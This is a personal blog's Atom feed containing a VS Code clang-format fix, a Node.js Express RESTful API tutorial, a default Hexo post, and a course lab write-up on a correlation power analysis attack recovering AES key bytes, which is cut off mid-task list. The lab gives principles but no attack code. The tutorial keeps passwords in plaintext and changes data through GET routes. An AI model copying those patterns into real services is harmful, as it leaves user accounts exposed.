<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>丹青</title>
<subtitle>琥珀</subtitle>
<link href="http://example.com/atom.xml" rel="self"/>
<link href="http://example.com/"/>
<updated>2022-03-18T06:03:46.018Z</updated>
<id>http://example.com/</id>
<author>
<name>MXBG</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>[VS Code] Fixing "The 'clang-format' command is not available. Please check your clang-format.executable"</title>
<link href="http://example.com/2022/03/18/%E3%80%90VS%20Code%E3%80%91%E2%80%9CThe%20%E2%80%98clang-format%E2%80%98%20command%20is%20not%20available.%20Please%20check%20your%20clang-format.executable%E2%80%9C%E8%A7%A3%E5%86%B3/"/>
<id>http://example.com/2022/03/18/%E3%80%90VS%20Code%E3%80%91%E2%80%9CThe%20%E2%80%98clang-format%E2%80%98%20command%20is%20not%20available.%20Please%20check%20your%20clang-format.executable%E2%80%9C%E8%A7%A3%E5%86%B3/</id>
<published>2022-03-18T08:16:16.577Z</published>
<updated>2022-03-18T06:03:46.018Z</updated>
<content type="html"><![CDATA[<p>When formatting C code in VS Code, I found that the 'clang-format' extension kept reporting this error:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">The 'clang-format' command is not available. Please check your clang-format.executable user setting and ensure it is installed.</span><br></pre></td></tr></table></figure><p>I found many suggested fixes online, and a lot of them talk about the .clang-format configuration file, but I could not make sense of them; in the end I got the solution from dynamsoft.<br>Download <a href="http://llvm.org/releases/3.7.0/LLVM-3.7.0-win32.exe">Clang for Windows (32-bit)</a> or <a href="http://llvm.org/releases/3.7.0/LLVM-3.7.0-win64.exe">Clang for Windows (64-bit)</a>.</p><p>After installation, add %LLVM%\bin to the system path. (The installer has an option to add it to the path directly.)</p><p>After that, you can use the shortcut Alt+Shift+F to format code in VS Code.</p><p>Reference link:<br><a href="https://www.dynamsoft.com/codepool/vscode-format-c-code-windows-linux.html">https://www.dynamsoft.com/codepool/vscode-format-c-code-windows-linux.html</a></p>]]></content>
<summary type="html"><p>When formatting C code in VS Code, I found that the 'clang-format' extension kept reporting this error:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class=</summary>
<category term="solution" scheme="http://example.com/tags/solution/"/>
</entry>
<entry>
<title>RESTful API</title>
<link href="http://example.com/2022/03/18/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94RESTful%20API/"/>
<id>http://example.com/2022/03/18/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94RESTful%20API/</id>
<published>2022-03-18T08:16:16.551Z</published>
<updated>2022-03-18T06:03:46.015Z</updated>
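<content type="html"><![CDATA[<h2 id="什么是-REST?"><a href="#什么是-REST?" class="headerlink" title="什么是 REST?"></a>What is REST?</h2><p>REST is a software architectural style. It is a design style, not a standard. REST is usually based on existing, widely used protocols and standards such as HTTP, URI, XML (a subset of Standard Generalized Markup Language) and HTML (an application of Standard Generalized Markup Language). REST usually uses the JSON data format.</p><h3 id="HTTP-方法"><a href="#HTTP-方法" class="headerlink" title="HTTP 方法"></a>HTTP methods</h3><p>The following are the four methods of the basic REST architecture:</p><ul><li><strong>GET</strong> - used to retrieve data</li><li><strong>PUT</strong> - used to update or add data</li><li><strong>DELETE</strong> - used to delete data</li><li><strong>POST</strong> - used to add data</li></ul><hr><h3 id="RESTful-Web-Services"><a href="#RESTful-Web-Services" class="headerlink" title="RESTful Web Services"></a>RESTful Web Services</h3><p>(I have not yet found much connection between this part and what I have studied, so I simply copied and pasted it.)<br>A web service is a platform-independent, loosely coupled, self-contained, programmable web-based application that can be described, published, discovered, coordinated and configured using open XML (a subset of Standard Generalized Markup Language) standards, and is used to develop distributed, interoperable applications.<br>Web services based on the REST architecture are RESTful.<br>Because it is lightweight and transfers data directly over HTTP, the RESTful approach to web services has become the most common alternative. Clients can be implemented in a variety of languages (such as Java programs, Perl, Ruby, Python, PHP and Javascript [including Ajax]).<br>RESTful web services can usually be accessed by automated clients or by applications acting on behalf of users. However, the simplicity of such services lets users interact with them directly, using their web browser to build a GET URL and read the returned content.<br>For more, see: <a href="https://www.runoob.com/w3cnote/restful-architecture.html">RESTful Architecture Explained</a></p><hr><h4 id="创建-RESTful"><a href="#创建-RESTful" class="headerlink" title="创建 RESTful"></a>Creating a RESTful API</h4><p>First, create a JSON data resource file users.json with the following content:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span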
class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> <span class="string">"user1"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"mahesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password1"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"teacher"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">1</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user2"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"suresh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password2"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"librarian"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">2</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user3"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"ramesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password3"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"clerk"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">3</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Based on the data above, we create the following RESTful APIs:<br><img src="https://img-blog.csdnimg.cn/20200319181807401.png" alt="在这里插入图片描述"></p><h4 id="获取用户列表:"><a href="#获取用户列表:" class="headerlink" title="获取用户列表:"></a>Getting the user list:</h4><p>In the following code, we create the RESTful API
listUsers, which reads the list of user information; the server.js code is as follows:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/listUsers'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( data );</span><br><span class="line"> res.<span class="title function_">end</span>( data );</span><br><span class="line"> });</span><br><span class="line">})</span><br><span
class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Next, run the following command:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>In a browser, visit <a href="http://127.0.0.1:8081/listUsers%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%9A">http://127.0.0.1:8081/listUsers; the result is as follows:</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> <span class="string">"user1"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"mahesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password1"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"teacher"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">1</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user2"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"suresh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password2"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"librarian"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">2</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"user3"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"ramesh"</span>,</span><br><span class="line"> <span class="string">"password"</span> : <span class="string">"password3"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"clerk"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">3</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="添加用户"><a href="#添加用户" 
class="headerlink" title="添加用户"></a>Adding a user</h4><p>In the following code, we create the RESTful API addUser, which adds new user data; the server.js code is as follows:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// New user data to add</span></span><br><span class="line"><span class="keyword">var</span> user = {</span><br><span class="line"> <span class="string">"user4"</span> : {</span><br><span class="line"> <span class="string">"name"</span> : <span class="string">"mohit"</span>,</span><br><span class="line"> <span
class="string">"password"</span> : <span class="string">"password4"</span>,</span><br><span class="line"> <span class="string">"profession"</span> : <span class="string">"teacher"</span>,</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">4</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/addUser'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="comment">// Read the existing data</span></span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> data = <span class="title class_">JSON</span>.<span class="title function_">parse</span>( data );</span><br><span class="line"> data[<span class="string">"user4"</span>] = user[<span class="string">"user4"</span>];</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( data );</span><br><span class="line"> res.<span class="title function_">end</span>( <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(data));</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span
class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>Next, run the following command:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>In a browser, visit <a href="http://127.0.0.1:8081/addUser%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%9A">http://127.0.0.1:8081/addUser; the result is as follows:</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">{ <span class="attr">user1</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'mahesh'</span>,</span><br><span class="line"> <span
class="attr">password</span>: <span class="string">'password1'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'teacher'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">1</span> },</span><br><span class="line"> <span class="attr">user2</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'suresh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password2'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'librarian'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">2</span> },</span><br><span class="line"> <span class="attr">user3</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'ramesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password3'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'clerk'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">3</span> },</span><br><span class="line"> <span class="attr">user4</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'mohit'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password4'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'teacher'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">4</span> } </span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="显示用户详情"><a href="#显示用户详情" class="headerlink" title="显示用户详情"></a>Showing user details</h4><p>In the following code, we create the RESTful API :id (the user id), which reads the details of the specified user; the server.js code is as follows:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/:id'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="comment">// First, read the existing users</span></span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> data = <span class="title class_">JSON</span>.<span class="title function_">parse</span>( data );</span><br><span class="line"> <span class="keyword">var</span> user = data[<span class="string">"user"</span> + req.<span class="property">params</span>.<span class="property">id</span>] </span><br><span
class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( user );</span><br><span class="line"> res.<span class="title function_">end</span>( <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(user));</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>Next, run the following command:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>In a browser, visit <a href="http://127.0.0.1:8081/2%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA">http://127.0.0.1:8081/2; the result is as follows</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> <span class="string">"name"</span>:<span class="string">"suresh"</span>,</span><br><span class="line"> <span class="string">"password"</span>:<span class="string">"password2"</span>,</span><br><span class="line"> <span class="string">"profession"</span>:<span class="string">"librarian"</span>,</span><br><span class="line"> <span class="string">"id"</span>:<span class="number">2</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="删除用户"><a href="#删除用户" class="headerlink" title="删除用户"></a>Deleting a user</h4><p>In the following code, we create the RESTful API deleteUser, which deletes the details of the specified user; in the example below the user id is 2, and the server.js code is as follows:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span
class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">"fs"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> id = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/deleteUser'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="comment">// First read existing users.</span></span><br><span class="line"> fs.<span class="title function_">readFile</span>( __dirname + <span class="string">"/"</span> + <span class="string">"users.json"</span>, <span class="string">'utf8'</span>, <span class="keyword">function</span> (<span class="params">err, data</span>) {</span><br><span class="line"> data = <span class="title class_">JSON</span>.<span class="title function_">parse</span>( data );</span><br><span class="line"> <span class="keyword">delete</span> data[<span class="string">"user"</span> + id];</span><br><span class="line"> </span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>( data );</span><br><span class="line"> res.<span class="title function_">end</span>( <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(data));</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span 
class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>Next, run the following command:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node server.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>In a browser, visit <a href="http://127.0.0.1:8081/deleteUser%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA%EF%BC%9A">http://127.0.0.1:8081/deleteUser; the result is as follows:</a></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">{ <span class="attr">user1</span>:</span><br><span class="line"> { <span class="attr">name</span>: <span class="string">'mahesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password1'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'teacher'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">1</span> },</span><br><span class="line"> <span class="attr">user3</span>:</span><br><span class="line">
{ <span class="attr">name</span>: <span class="string">'ramesh'</span>,</span><br><span class="line"> <span class="attr">password</span>: <span class="string">'password3'</span>,</span><br><span class="line"> <span class="attr">profession</span>: <span class="string">'clerk'</span>,</span><br><span class="line"> <span class="attr">id</span>: <span class="number">3</span> } </span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>还是复制粘贴……因为这还是举例部分……</p><blockquote><p>乱码问题:<br>除了不是文件读取的编码问题,可以考虑为浏览器自动为没有在 html > head 中解释编码的 html 编码为本地默认编码。可以主动添加 head:<br><code>res.setHeader('Content-Type', 'text/html; charset=utf8');</code></p></blockquote><p>本篇博客是参考<a href="https://www.runoob.com/nodejs/nodejs-restful-api.html">Node.js菜鸟教程</a>,详情可跳至<a href="https://www.runoob.com/nodejs/nodejs-restful-api.html">菜鸟教程</a>。</p><hr><p>后续本人会对写过的博客进行更新</p><hr>]]></content>
<summary type="html"><h2 id="什么是-REST?"><a href="#什么是-REST?" class="headerlink" title="什么是 REST?"></a>What is REST?</h2><p>An architectural style for software. REST is a design style, not a standard. REST is usually based on HTTP, URI</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>Hello World</title>
<link href="http://example.com/2022/03/18/hello-world/"/>
<id>http://example.com/2022/03/18/hello-world/</id>
<published>2022-03-18T07:00:21.920Z</published>
<updated>2022-03-18T07:00:21.920Z</updated>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<summary type="html"><p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for</summary>
</entry>
<entry>
<title>AES CPA Attack</title>
<link href="http://example.com/2021/12/26/%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AE%9E%E9%AA%8C%E5%9B%9B%20AES%20CPA%20%E6%94%BB%E5%87%BB/"/>
<id>http://example.com/2021/12/26/%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AE%9E%E9%AA%8C%E5%9B%9B%20AES%20CPA%20%E6%94%BB%E5%87%BB/</id>
<published>2021-12-26T14:03:09.000Z</published>
<updated>2022-03-18T06:03:46.020Z</updated>
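<content type="html"><![CDATA[<p>I referred to an expert's <a href="https://github.com/newaetech/wiki.newae.com/blob/master/Tutorial_B6_Breaking_AES_%28Manual_CPA_Attack%29.mw">article</a> and learned a great deal from it.<br>Because this is a course lab, I have not uploaded all of the code; the referenced article contains the complete code.</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Objectives</h2><ol><li>Understand how power traces of the AES algorithm are constructed;</li><li>Understand the basic principle of the CPA attack on AES.</li></ol><h2 id="实验人数"><a href="#实验人数" class="headerlink" title="实验人数"></a>Group size</h2><p>1 person per group</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>System environment</h2><p>Windows</p><h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>Principle</h2><p>CPA (correlation power analysis) uses a hypothetical model of the cryptographic chip to predict its power consumption during encryption and decryption, then correlates the prediction with the actually measured power consumption to infer the key. CPA attacks usually use the Hamming weight model. The Hamming weight is the total number of 1 symbols in a codeword; the larger the Hamming weight, the higher the chip's power consumption during the operation.</p><h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>Tasks</h2><ol><li><p>Readfile-student.py: reads in and stores the AES power-consumption waveform files; the "Save2Npy" function outputs the power trace data.</p><ul><li>Analyze what data the pts, pcts and pns read by the program each hold, what their types are, and what their dimensions are</li></ul></li><li><p>CPA-student.py: recovers the 16 key bytes using the Hamming weight model.</p><ul><li>Fill in the code that computes the correlation coefficient, and record the maximum value as maxcpa</li><li>Explain the meaning of each generated plot (horizontal and 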